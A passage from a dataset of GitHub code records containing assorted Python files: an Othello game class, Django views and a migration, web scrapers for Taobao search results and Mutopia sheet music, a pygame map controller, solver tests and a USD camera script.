tiles corresponding to the given coordinates'''\n        self.board[x][y] = self.current_player\n        self.current_p_points +=1\n        for move in move_set:\n            x_move = x + move[0]\n            y_move = y + move[1]\n            while(self.board[x_move][y_move] != self.current_player):\n                self.board[x_move][y_move] = self.current_player\n                self.current_p_points +=1\n                self.other_p_points -=1\n                x_move += move[0]\n                y_move += move[1]\n    \n    def _is_valid_move(self,x:int,y:int)->[list]:\n        '''Checks whether the given coordinates are a valid move for the current player'''\n        to_return = []\n        if(self.board[x][y] != self.NONE):\n            return to_return\n        possible_moves = [[-1,-1],[-1,0],[-1,1],[0,-1],[0,1],[1,-1],[1,0],[1,1]]\n        for move in possible_moves:\n            x_move = x + move[0]\n            y_move = y + move[1]\n            while(self._is_in_board(x_move,y_move)):\n                if(self.board[x_move][y_move] == self.NONE):\n                    break\n                elif(self.board[x_move][y_move] == self.current_player):\n                    if(x + move[0] == x_move and y + move[1] == y_move):\n                        break\n                    else:\n                        to_return.append([move[0],move[1]])\n                x_move += move[0]\n                y_move += move[1]\n        return to_return\n    def get_winner(self)->str:\n        '''Returns a string naming the winner, or reports a tie'''\n        if(self.default == True):\n            if(self.black_points > self.white_points):\n                return 'The winner is '+self.black\n            elif(self.black_points < self.white_points):\n                return 'The winner is '+self.white\n        else:\n            if(self.black_points < self.white_points):\n                return 'The winner is '+self.black\n            elif(self.black_points > self.white_points):\n                return 'The winner is '+self.white\n        return \"Game is a Tie\"\n    \n    def has_valid_move(self,player:str)->bool:\n        '''Checks whether the given player has a valid move'''\n        prev_player = self.current_player\n        self.current_player = player\n        for i in range(self.rows):\n            for j in range(self.columns):\n                if(self._is_valid_move(i,j) != []):\n                    self.current_player = prev_player\n                    return True\n        self.current_player = prev_player\n        return False\n    \n    def _update_points(self)->None:\n        '''Updates the points after flipping has occurred'''\n        if(self.current_player == self.black):\n            self.black_points += self.current_p_points\n            self.white_points += self.other_p_points\n        else:\n            self.black_points += self.other_p_points\n            self.white_points += self.current_p_points\n        self.other_p_points = 0\n        self.current_p_points = 0\n    def _compute_player(self):\n        '''Checks whether either player still has a valid move; raises OthelloGameOver if neither does'''\n        if(self.has_valid_move(self.other_player)):\n            self._change_player()\n        elif(self.has_valid_move(self.current_player) != True and (self.has_valid_move(self.other_player) != True)):\n            self.game_over = True\n            raise OthelloGameOver()\n    \n    def _change_player(self):\n        '''Swaps the current player and the other player'''\n        prev_player = self.current_player\n        self.current_player = self.other_player\n        self.other_player = prev_player\n        \n    def _require_valid_column_number(self,column_number: int) -> None:\n        '''Raises a ValueError if its parameter is not a valid column number'''\n        if type(column_number) != int or not self._is_valid_column_number(column_number):\n            raise ValueError('column_number must be int between 0 and {}'.format(self.columns))\n\n    def _require_valid_row_number(self,row_number: int) -> None:\n        '''Raises a ValueError if its parameter is not a valid row number'''\n        if type(row_number) != int or not self._is_valid_row_number(row_number):\n            raise ValueError('row_number must be int between 0 and {}'.format(self.rows))\n    \n    def _is_valid_column_number(self,column_number: int) -> bool:\n        '''Returns True if the given column number is valid; returns False otherwise'''\n        return 0 <= column_number < self.columns\n\n\n\n    def _is_valid_row_number(self,row_number: int) -> bool:\n        '''Returns True if the given row number is valid; returns False otherwise'''\n        return 0 <= row_number < self.rows\n
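\n\n# Added usage sketch (illustration only, not part of the original module; an 8x8\n# game with 'Black' moving first and holding the top-left centre square):\nif __name__ == '__main__':\n    game = Othello(8, 8, 'Black', 'Black', True)\n    game.make_move(2, 4)   # flips the white disc at (3, 4); illegal moves raise InvalidOthelloMoveError\n    print(game.get_player())                      # -> White\n    print(game.black_points, game.white_points)   # -> 4 1\n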
","repo_name":"oosantia/Othello","sub_path":"othello_class.py","file_name":"othello_class.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30162992789","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport jsonfield.fields\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('fieldsight', '0069_merge'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='project',\n            name='gsuit_meta',\n            field=jsonfield.fields.JSONField(default={}),\n        ),\n    ]\n","repo_name":"fieldsight/fieldsight","sub_path":"onadata/apps/fieldsight/migrations/0070_project_gsuit_meta.py","file_name":"0070_project_gsuit_meta.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"51"} +{"seq_id":"20977584287","text":"import numpy as np\n\n\nclass NeuronGroup:\n    def __init__(self, model, layer_id, dimension_ranges=None, neuron_idx_list=None):\n        self.layer_id = layer_id\n        if neuron_idx_list is not None:\n            self.neuron_idx_list = neuron_idx_list\n        else:\n            self.neuron_idx_list = list()\n            output_shape = model.layers[layer_id].output_shape[1:]\n            for neuron_idx in np.ndindex(output_shape):\n                if dimension_ranges is not None:\n                    if not self.neuron_in_range(dimension_ranges, neuron_idx):\n                        continue\n                self.neuron_idx_list.append(neuron_idx)\n\n    @staticmethod\n    def neuron_in_range(dimension_ranges, neuron_idx):\n        for dimension_idx, dimension_range in enumerate(dimension_ranges):\n            if dimension_range[0] <= neuron_idx[dimension_idx] < dimension_range[1]:\n                pass\n            else:\n                return False\n        return True\n","repo_name":"uwdb/DeepEverest","sub_path":"NeuronGroup.py","file_name":"NeuronGroup.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"51"} +{"seq_id":"17247856170","text":"# encoding:utf-8\nimport re  # use regular expressions to match the data we want\nimport requests  # use requests to fetch the page source\nimport xlwt\n\n# Fetch the page at the URL passed in from main\ndef getHtmlText(url):\n    try:  # exception handling\n        # request the URL you passed in, with a 3-second timeout\n        r = requests.get(url, timeout=3)\n        # check its HTTP status code\n        r.raise_for_status()\n        # set its encoding: encoding is taken from the response headers, while apparent_encoding is inferred from the returned page content\n        r.encoding = r.apparent_encoding\n        # return the page source\n        return r.text\n    except:  # on any exception return an empty string\n        return ''\n
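\n# Added note (illustrative, reconstructed from the regexes below): the search\n# page embeds item data as JSON fragments such as \"view_price\":\"128.00\",\n# \"raw_title\":\"...\", \"view_sales\":\"87人付款\"; parsePage pulls these fields out.\n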
\n# Parse the page source\ndef parsePage(ilt, html):\n    # exception handling\n    try:\n        # find the prices\n        plt = re.findall(r'\\\"view_price\\\"\\:\\\"[\\d\\.]*\\\"', html)\n        # find the titles\n        tlt = re.findall(r'\\\"raw_title\\\"\\:\\\".*?\\\"', html)\n        # find the locations\n        add = re.findall(r'\\\"item_loc\\\"\\:\\\".*?\\\"', html)\n        # find the number of buyers\n        sal = re.findall(r'\\\"view_sales\\\"\\:\\\"[\\d]*人付款\\\"', html)\n        # find the image links\n        img = re.findall(r'\\\"pic_url\\\"\\:\\\".*?\\\"', html)\n        # put the extracted values into the list passed in from main\n        for i in range(len(plt)):\n            price = eval(plt[i].split(':')[1])\n            title = eval(tlt[i].split(':')[1])\n            sales = eval(sal[i].split(\":\")[1])\n            address = eval(add[i].split(':')[1])\n            imgs = eval(img[i].split(':')[1])\n            ilt.append([price, title, sales, address, imgs])\n    except:  # on an exception print an empty string\n        print('')\n\n# Write the list passed in from main out to an Excel file\ndef printGoodsList(ilt):\n    count = 0  # running row number\n    book = xlwt.Workbook(encoding='utf-8', style_compression=0)  # style_compression: whether to compress; rarely used\n    sheet = book.add_sheet('test', cell_overwrite_ok=True)\n\n    sheet.write(0, 0, '序号')\n    sheet.write(0, 1, '价格')\n    sheet.write(0, 2, '商品名称')\n    sheet.write(0, 3, '付款人数')\n    sheet.write(0, 4, '地址')\n    sheet.write(0, 5, '图片地址')\n\n    for g in ilt:\n        count = count + 1  # increment once per loop pass\n        num = count\n        #print(tplt.format(count, g[0], g[1], g[2]), g[3], g[4])  # print the data you obtained\n        sheet.write(count, 0, num)\n        sheet.write(count, 1, g[0])\n        sheet.write(count, 2, g[1])\n        sheet.write(count, 3, g[2])\n        sheet.write(count, 4, g[3])\n        sheet.write(count, 5, g[4])\n\n    book.save(r'F:\\test1.xls')  # prefixing the string with r makes it a raw string so the backslash is not treated as an escape; otherwise it may raise an error\n\n# Define the main function\ndef main():\n    goods = '童装'  # the keyword you want to search for\n    depth = 1  # how many pages you want to fetch\n    start_url = 'https://s.taobao.com/search?q=' + goods  # the search URL with your keyword appended\n    infoList = []  # an empty list to hold the scraped data\n    for i in range(depth):  # loop over the pages\n        try:  # exception handling\n            url = start_url + '&s=' + str(44 * i)  # build this page's URL ('s' is the item offset, 44 items per page)\n            html = getHtmlText(url)  # fetch the page source for this URL\n            parsePage(infoList, html)  # parse the fetched HTML source\n        except:  # skip on any exception\n            continue\n    # hand the collected list to the output function\n    printGoodsList(infoList)\n\n# Script entry point\nif __name__ == '__main__':\n    main()  # call the main function\n","repo_name":"zw398430866/study_code","sub_path":"02 Python/01 爬图程序/ClimbTest.py","file_name":"ClimbTest.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"16785464121","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport os\nimport re\nfrom pdf2image import convert_from_path\n\n\"\"\"\nHere is a script that scrapes the Mutopia Project at mutopiaproject.org for sheet music. The jpg files will be saved\nto a directory located at the path provided by the user at the bottom.\n\"\"\"\n\n\nclass SheetMusicScraper:\n\n    def __init__(self):\n        self.save_jpeg = input(\"Would you like the sheet music to be saved as jpegs (y/n)?\\n\")\n        self.jpgs = []\n        self.names = []\n        self.composers = []\n\n    def scrape(self, path):\n        \"\"\"\n        Scrape mutopiaproject.org for all of its sheet music in pdf format and save it to the path provided\n        :param path: the path at which to save the pdf files\n        \"\"\"\n        if not os.path.exists(path):\n            print(\"Path does not exist\")\n            print(\"Creating directory...\")\n            os.mkdir(path)\n            print(\"Complete.\")\n        else:\n            print(\"Path exists! 
Saving data there.\")\n\n print(\"Scraping data...\")\n for i in range(0, 2111, 10):\n if i % 100 == 0:\n print(\"Sheet Music Page:\", i)\n url = \"http://www.mutopiaproject.org/cgibin/make-table.cgi?startat=\" + str(i) + \"&searchingfor=\" \\\n \"&Composer=&Instrument=&Style=&collection=&id=&solo=&recent=&timelength=1&timeunit=week&lilyversion=\" \\\n \"&preview=\"\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, 'html.parser')\n box = soup.findAll('table', attrs={\"class\": \"table-bordered result-table\"})\n box = str(box)\n count = 0\n while True:\n try:\n ex = re.search(r'((.*)', box)\n name = ex.group(1)\n self.names.append(name)\n try:\n ex = re.search(r'by (.*) \\(', box)\n composer = ex.group(1)\n except:\n print(\"Anonymous composer!\")\n composer = \"Anonymous\"\n self.composers.append(composer)\n box = box[box.index(\"Letter .pdf file\")+24:]\n if count == 0:\n print(\"Name:\", name)\n print(\"Composer:\", composer, \"\\n\")\n count += 1\n except:\n break\n\n # Now that we have the list of links that download the pdfs, we must request them and save them\n num = 0\n if (len(self.jpgs) == len(self.names)) and (len(self.jpgs) == len(self.composers)):\n print(\"Length check: Passed :)\")\n num = len(self.jpgs)\n else:\n print(\"Length check: Failed :(\")\n print(\"JPGs Length:\", len(self.jpgs))\n print(\"Names Length:\", len(self.names))\n print(\"Composers Length:\", len(self.composers))\n exit(0)\n print(\"Saving files to given directory...\")\n for i in range(num):\n res = urllib.request.urlopen(self.jpgs[i])\n # Make a directory for each composer, because why not.\n if not os.path.exists(path + self.composers[i]):\n os.mkdir(path + self.composers[i])\n # check if a '/' is in the filename. Replace it with some arbitrary character to avoid confusion\n if '/' in self.names[i]:\n self.names[i] = self.names[i].replace('/', ':')\n file = open(path + self.composers[i] + '/' + self.names[i] + '.pdf', 'wb') # must save as pdf first\n file.write(res.read())\n file.close()\n # Now convert saved pdf to jpg\n if self.save_jpeg.lower()[0] == 'y':\n pages = convert_from_path(path + self.composers[i] + '/' + self.names[i] + '.pdf', 500)\n page_count = 1\n for page in pages:\n page.save(path + self.composers[i] + '/' + self.names[i] + 'Page' + str(page_count) + '.jpg', 'JPEG')\n page_count += 1\n print(\"Saving complete.\")\n print(\"Script execution complete!\")\n\n\nif __name__ == \"__main__\":\n sheet_scraper = SheetMusicScraper()\n path = input(\"Enter the path at which you'd like the dataset to be saved:\\n\")\n if not path.endswith('/'):\n path += '/'\n sheet_scraper.scrape(path)\n","repo_name":"npool9/SheetMusicScraper","sub_path":"sheetmusic_scraper.py","file_name":"sheetmusic_scraper.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33344103316","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import item\n\n# get all the items\ndef HomePage(request):\n all_items = item.objects.all()\n return render(request, \"home.html\", {\"all_items\": all_items})\n\n\n# add an item\ndef addItem(request):\n content = request.POST[\"content\"]\n new_item = item(content=content, name=\"chocolate\", price=111)\n new_item.save()\n return HttpResponseRedirect(\"/home/\")\n\n\n# delete an item\ndef deleteItem(request, item_id):\n Deleteitem = item.objects.get(id=item_id)\n Deleteitem.delete()\n return 
HttpResponseRedirect(\"/home/\")\n\n\n# update an item\ndef updateItem(request, item_id):\n    updateItem = item.objects.get(id=item_id)\n    return render(request, \"update.html\", {\"updateItem\": updateItem})\n\n\ndef updateItemPage(request):\n    updated_Item = item(\n        id=request.POST[\"item_id\"],\n        content=request.POST[\"content\"],\n        name=request.POST[\"name\"],\n        price=request.POST[\"price\"],\n    )\n    updated_Item.save()\n    return HttpResponseRedirect(\"/home/\")\n\n\ndef itemDetailsView(request, item_id):\n    requireditem = item.objects.get(id=item_id)\n    return render(request, \"itemDetailsPage.html\", {\"item\": requireditem})","repo_name":"Md-Golam-Sarowar/Django-inventory-app","sub_path":"todoApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43194826909","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom indj_mir.com.indj.mir.services import FastDTW\nfrom rest_framework import permissions\nfrom rest_framework.decorators import api_view, permission_classes\nfrom indj_mir.com.indj.mir.services import HandleAudioFile\nimport sys\n\n\n@api_view(['POST'])\n@permission_classes((permissions.AllowAny,))\ndef execute_all_songs(request):\n    try:\n        print('Start handling ....')\n        HandleAudioFile.handle_all_files_mp3()\n        FastDTW.calculate_all_songs()\n        return Response(status=status.HTTP_201_CREATED)\n    except Exception as ex:\n        print(ex, file=sys.stderr)\n        return Response(ex.__cause__, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['POST'])\n@permission_classes((permissions.AllowAny,))\ndef execute_source_uid(request):\n    try:\n        print('--- Start handling ...')\n        print('sourceUID: ', request.data['sourceUID'])\n        HandleAudioFile.handle_song_uid(request.data['sourceUID'])\n        HandleAudioFile.convert_mp3_wav(request.data['sourceUID'] + '.mp3')\n        FastDTW.calculate_mfcc(request.data['sourceUID'] + '.mp3')\n        HandleAudioFile.remove_mp3_wav_file(request.data['sourceUID'] + '.mp3')\n        FastDTW.calculate_by_source_uid(request.data['sourceUID'])\n        return Response(status=status.HTTP_201_CREATED)\n    except Exception as ex:\n        print(ex, file=sys.stderr)\n        return Response(ex.__cause__, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"trinhkhoi/MIR","sub_path":"indj_mir/com/indj/mir/controllers/FastDTWController.py","file_name":"FastDTWController.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26354011887","text":"# OpenRTS - Copyright (C) 2006 The OpenRTS Project\r\n#\r\n# OpenRTS is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# OpenRTS is distributed in the hope that it will be useful, but\r\n# WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  
See the GNU\r\n# General Public License for more details.\r\n\r\nimport pygame\r\nimport logging\r\nfrom pygame.locals import *\r\n\r\n#****************************************************************************\r\n# Mapctrl handles user-input on the main map view, and tells the client\r\n# what to do.\r\n#****************************************************************************\r\nclass Mapctrl:\r\n\r\n def __init__(self, gameclient):\r\n self.client = gameclient;\r\n self.selected_units = {};\r\n self.mouse_state = \"default\";\r\n\r\n#****************************************************************************\r\n# Handle input events from pygame.\r\n#****************************************************************************\r\n def handle_events(self):\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n self.client.quit()\r\n elif event.type == KEYDOWN and event.key == K_ESCAPE:\r\n self.client.quit();\r\n elif event.type == KEYDOWN and event.key == K_RETURN:\r\n self.client.mappanel.send_chat();\r\n elif event.type == KEYDOWN and event.key == K_f:\r\n logging.info(self.client.clock.get_fps());\r\n elif event.type == KEYDOWN and event.key == K_a:\r\n self.set_mouse_state('attack');\r\n elif event.type == MOUSEBUTTONDOWN:\r\n self.handle_mouse_click(pygame.mouse.get_pos(), event.button);\r\n elif event.type == MOUSEBUTTONUP:\r\n self.handle_mouse_release(pygame.mouse.get_pos(), event.button);\r\n elif event.type == MOUSEMOTION:\r\n self.mouse_motion(pygame.mouse.get_pos())\r\n\r\n self.client.mappanel.app.event(event);\r\n\r\n self.client.mapview.cursor.update(event);\r\n\r\n#****************************************************************************\r\n# Handles all mouse click events from Pygame.\r\n#****************************************************************************\r\n def handle_mouse_click(self, pos, button):\r\n if button == 1:\r\n (x, y) = pos; \r\n if self.mouse_state == \"default\":\r\n self.select_pos_start = pygame.mouse.get_pos(); \r\n self.select_pos_end = pygame.mouse.get_pos(); \r\n self.set_mouse_state('select');\r\n \r\n if self.mouse_state == 'goto':\r\n self.handle_goto(x, y); \r\n elif button == 3:\r\n map_pos = self.client.mapview.canvas_to_map(pos); \r\n self.client.mapview.center_view_on_tile(map_pos);\r\n\r\n self.client.mappanel.handle_mouse_click(pos);\r\n\r\n#****************************************************************************\r\n# Handles all mouse release events from Pygame.\r\n#****************************************************************************\r\n def handle_mouse_release(self, pos, button):\r\n if button == 1 and self.mouse_state == 'select': \r\n self.define_tiles_within_rectangle();\r\n\r\n#****************************************************************************\r\n#\r\n#****************************************************************************\r\n def handle_goto(self, canvas_x, canvas_y):\r\n self.set_mouse_state('default');\r\n map_pos = self.client.mapview.canvas_to_map((canvas_x, canvas_y));\r\n for unit in self.selected_units.values():\r\n logging.info(\"Selected unit id %r\" % unit.id);\r\n start_tile = self.client.map.get_tile_from_unit(unit);\r\n end_tile = self.client.map.get_tile(map_pos);\r\n logging.info(\"dist %r\" % self.client.map.get_distance(start_tile, end_tile));\r\n if self.client.map.get_distance(start_tile, end_tile) > 40:\r\n logging.info(\"Distance is too long.\");\r\n return;\r\n self.client.map.find_path(unit,\r\n self.client.ruleset,\r\n start_tile, end_tile);\r\n 
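# Note (added): find_path's return value is unused here; the pathfinder\r\n        # presumably records the computed route on the unit itself.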
\r\n\r\n#****************************************************************************\r\n#\r\n#****************************************************************************\r\n def define_tiles_within_rectangle(self):\r\n w = self.client.tileset.tile_width / 2;\r\n h = self.client.tileset.tile_height / 12;\r\n half_w = w / 2;\r\n half_h = h / 2;\r\n (x1, y1) = self.select_pos_start;\r\n (x2, y2) = self.select_pos_end;\r\n rec_w = x2 - x1;\r\n rec_h = y2 - y1;\r\n segments_x = abs(rec_w/ half_w);\r\n segments_y = abs(rec_h/ half_h);\r\n self.selected_units = {};\r\n\r\n self.set_mouse_state('default') \r\n \r\n # Iteration direction \r\n if rec_w > 0:\r\n inc_x = half_w;\r\n else:\r\n inc_x = -half_w;\r\n if rec_h > 0:\r\n inc_y = half_h;\r\n else:\r\n inc_y = -half_h;\r\n \r\n y = y1;\r\n yy = 0;\r\n while (yy <= segments_y): \r\n x = x1;\r\n xx = 0;\r\n while (xx <= segments_x):\r\n map_pos = self.client.mapview.canvas_to_map((x, y));\r\n unit = self.client.map.get_unit(map_pos);\r\n if unit: \r\n self.selected_units.update({map_pos:unit});\r\n self.set_mouse_state('goto');\r\n yy += 1;\r\n y += inc_y;\r\n xx += 1;\r\n x += inc_x;\r\n logging.info(\"Selected %r units\" % len(self.selected_units.values()));\r\n\r\n\r\n#****************************************************************************\r\n# The mouse moved, do a scroll. \r\n#****************************************************************************\r\n def mouse_motion(self, pos):\r\n (x, y) = pos;\r\n# if y > self.client.mapview.mapcanvas.get_height(): \r\n# self.client.mapview.cursor.disable();\r\n# else:\r\n# self.client.mapview.cursor.set_cursor_type(self.mouse_state);\r\n if self.mouse_state == 'select':\r\n self.select_pos_end = pygame.mouse.get_pos(); \r\n\r\n\r\n#****************************************************************************\r\n#\r\n#****************************************************************************\r\n def set_mouse_state(self, state):\r\n\r\n if state == 'default':\r\n self.client.mapview.cursor.disable();\r\n else:\r\n self.client.mapview.cursor.set_cursor_type(state);\r\n\r\n self.mouse_state = state;\r\n\r\n","repo_name":"Donkyhotay/openrts","sub_path":"client/mapctrl.py","file_name":"mapctrl.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"2935896860","text":"import unittest\nfrom sympy import *\n\nfrom ..solver import *\nfrom .test_case_lib import *\nfrom .test_helper import *\n\ncases = get_cases()\n# case = cases[-1]\ncase = cases[8]\n\n# p402, p83, p199, p14, p145, p205, p390, p189, p471, p500 = symbols('p402 p83 p199 p14 p145 p205 p390 p189 p471 p500')\n\n# obj_fn = p14 + 12*p145 + p189 + 2*p199 + 3*p390 + p471 + 3*p83\n\n# b = [\n# p402 <= 3,\n# p83 <= 3,\n# p199 + 9*p205 + 9*p471 <= 3,\n# p14 <= 3,\n# p145 <= 3,\n# p390 <= 3,\n# p189 <= 3,\n# p500 <= 3,\n# p145 + p402 <= 5,\n# p14 + p199 + p205 + p390 + p471 + p500 + p83 <= 5,\n# p189 <= 3,\n# 75*p14 + 40*p145 + 45*p189 + 55*p199 + 45*p205 + 60*p390 + 55*p402 + 50*p471 + 55*p500 + 50*p83 <= 1000,\n# p14 + p145 + p189 + p199 + p205 + p390 + p402 + p471 + p500 + p83 <= 3,\n# p14 + p145 + p189 + p199 + p205 + p390 + p402 + p471 + p500 + p83 >= 3\n# ]\n\n# case = Binary_ILP_case([p402, p83, p199, p14, p145, p205, p390, p189, p471, p500], obj_fn, b)\n\n\nclass TestDebug(unittest.TestCase):\n\n def setUp(self): # This runs at the beginning of every test case\n self.result = case.solve(case.algo.implicit_enumeration, 
print_run_count=True)\n\n def test_all_solve_methods_get_same_result(self):\n\n result = run_all_algos(case, True)\n\n self.assertEqual(result['a'].obj_val, result['b'].obj_val)\n self.assertEqual(result['a'].obj_val, result['c'].obj_val)\n\n def test_objective_val_is_correct(self):\n\n if self.result.obj_val != -oo:\n direct_obj_val = case.get_obj_fn_val(case.obj_fn, self.result.var_vals)\n self.assertEqual(self.result.obj_val, direct_obj_val)\n\n def test_all_constraints_met(self):\n\n print('The final result is: ', self.result)\n\n if self.result.obj_val != -oo:\n self.assertTrue(case.is_feasible(b=case.b, var_vals=self.result.var_vals, debug=False))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"dwang28/ilp_solver","sub_path":"testing/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12709290979","text":"import sys\nfrom model import GoodsModel\nfrom bll import GoodsController\n\nclass GoodsView:\n def __init__(self):\n self.controller = GoodsController()\n def main(self):\n while True:\n self.__view_menu()\n self.__select_menu()\n def __view_menu(self):\n print(\"1键录入商品信息\")\n print(\"2键查看商品信息\")\n print(\"3键删除商品信息\")\n print(\"4键修改商品信息\")\n print(\"0键退出系统\")\n def __select_menu(self):\n data = int(input(\"请选择操作\"))\n if data == 1:\n self.__input_message()\n elif data == 2:\n self.__display_message()\n elif data == 3:\n self.__delete_message()\n elif data == 4:\n self.__update_message()\n elif data == 0 :\n print(\"已退出程序\")\n sys.exit()\n def __input_message(self):\n goodsmodel = GoodsModel()\n goodsmodel.name = input(\"输入商品名称:\")\n goodsmodel.price = input(\"输入商品价格:\")\n self.controller.add_goods(goodsmodel)\n def __display_message(self):\n for item in self.controller.goods_list:\n print(item)\n def __delete_message(self):\n goods_id = int(input(\"请输入要删除的商品ID:\"))\n if self.controller.remove_goods(goods_id):\n print(\"删除成功\")\n else:\n print(\"删除失败\")\n def __update_message(self):\n model = GoodsModel()\n model.goods_id = int(input(\"请输入要修改的商品ID:\"))\n model.name = input(\"请输入修改后的名称:\")\n model.price = int(input(\"请输入修改后的价格:\"))\n if self.controller.update_goods(model):\n print(\"修改成功\")\n else:\n print(\"修改失败\")","repo_name":"wangqiang91/python_study","sub_path":"month01/day13_advanced_python/student_info_manager_system/usl.py","file_name":"usl.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4349873881","text":"from pxr import Gf\nfrom pxr import Vt\nfrom pxr import Usd\nfrom pxr import UsdGeom\n\nstage = Usd.Stage.CreateInMemory()\nUsdGeom.SetStageUpAxis(stage, UsdGeom.Tokens.z)\ncamera = UsdGeom.Camera.Define(stage, \"/Camera\")\n\ncamera_prim = camera.GetPrim()\ncamera_prim.GetAttribute(\"focalLength\").Set(11)\nUsdGeom.XformCommonAPI(camera_prim).SetRotate((90, 0, 180))\nUsdGeom.XformCommonAPI(camera_prim).SetTranslate((0, 500, 100))\n\ncmin, cmax = camera_prim.GetAttribute(\"clippingRange\").Get()\nclipping_plane = camera_prim.GetAttribute(\"clippingPlanes\")\nvec = Gf.Vec4f([1, 0, 0, 1])\npln = Vt.Vec4fArray((0, 1, 0, 
0))\nclipping_plane.Set(pln)\nprint(stage.GetRootLayer().ExportToString())\n","repo_name":"compas-dev/compas_usd","sub_path":"scripts/camera_with_clipping_plane.py","file_name":"camera_with_clipping_plane.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"38176535111","text":"import os\nimport math\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\n\n\n\n\ndef main():\n\tdatafile = 'data_probstic_08.txt'\n\tcore_depths, a1,a2,a3,cs = np.genfromtxt(datafile, usecols=(0,1,2,3,4), unpack=True)\n\n\n\tidx=0\n\t# write multinomial matrix\n\twith file('synth_core_prop_08.txt', 'wb') as outfile:\n\t\tfor x in range(core_depths.size):\n\t\t\tslc=[]\n\t\t\trev = x#-1-x\n\t\t\t# print 'a1[x],a2[x],a3[x],cs[x]',a1[x],a2[x],a3[x],cs[x]\n\t\t\tslc = np.append(slc, (a1[x],a2[x],a3[x],cs[x]))\n\t\t\tfacies_idx = np.argmax(slc)\n\t\t\tvector = np.zeros(4)\n\t\t\tvector[facies_idx] = 1\n\t\t\toutfile.write(('{0}\\t'.format(core_depths[rev])))\n\t\t\tfor y in range(4):\n\t\t\t\toutfile.write('{0}\\t'.format(vector[y]))\n\t\t\toutfile.write('\\n')\n\twith file('synth_core_vec_08.txt', 'wb') as outfile:\n\t\tfor x in range(core_depths.size):\n\t\t\tslc=[]\n\t\t\tslc = np.append(slc, (a1[x],a2[x],a3[x],cs[x]))\n\t\t\tfacies_idx = np.argmax(slc)\n\t\t\toutfile.write('{0}\\t{1}\\n'.format(core_depths[x],facies_idx+1))\n\t\n\t# data = np.loadtxt(\"synth_core.txt\")\n\t# core_depths = data[:,0]\n\t# print 'core_depths', core_depths\n\t# print 'core_depths.size',core_depths.size\n\t# core_data = data[:,1]\n\t# print 'core_data',core_data\n\t# pred_core = np.zeros((core_depths.size,4))\n\n\t# for n in range(0,core_depths.size):\n\t# \t\tif core_data[n] == 0.571:\n\t# \t\t\tpred_core[n,3] = 1 \n\t# \t\tif core_data[n] == 0.429:\n\t# \t\t\tpred_core[n,2] = 1 \n\t# \t\tif core_data[n] == 0.286:\n\t# \t\t\tpred_core[n,1] = 1 \n\t# \t\tif core_data[n] == 0.143:\n\t# \t\t\tpred_core[n,0] = 1 \n\n\t# print pred_core\n\n\t# pred_core_ = str(pred_core)\n\n\t# with file('testing.txt','wb') as outfile:\n\t# \toutfile.write ('')\n\n\t# with file('testing.txt','ab') as outfile:\n\t# \tfor x in range(0,core_depths.size):\n\t# \t\tfor y in range(0,4):\n\t# \t\t\tval = str(int(pred_core[x,y]))\n\t# \t\t\trev = -1-x\n\t# \t\t\tdepth_str = str(core_depths[rev])\n\t# \t\t\toutfile.write('{0}\\t{1}\\n'.format(depth_str, val))\n\nif __name__ == \"__main__\": main()\n\n#Need to load what is output by the RunModel\n","repo_name":"intelligentEarth/Bayesreef","sub_path":"Preliminary_Sampling2018/depth-based_likl/data/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"12677799031","text":"import sys\r\n\r\nimport numpy as np\r\nfrom scipy.linalg import fractional_matrix_power\r\nfrom scipy.sparse import csgraph\r\nfrom sklearn.base import BaseEstimator, ClassifierMixin\r\nfrom sklearn.neighbors import NearestNeighbors\r\nfrom sklearn.utils.validation import check_X_y, check_array, check_is_fitted\r\nfrom sklearn.utils.multiclass import unique_labels\r\nfrom sklearn.metrics.pairwise import pairwise_kernels\r\n\r\n\r\n# def Lap_M_computing(K_V_V): # 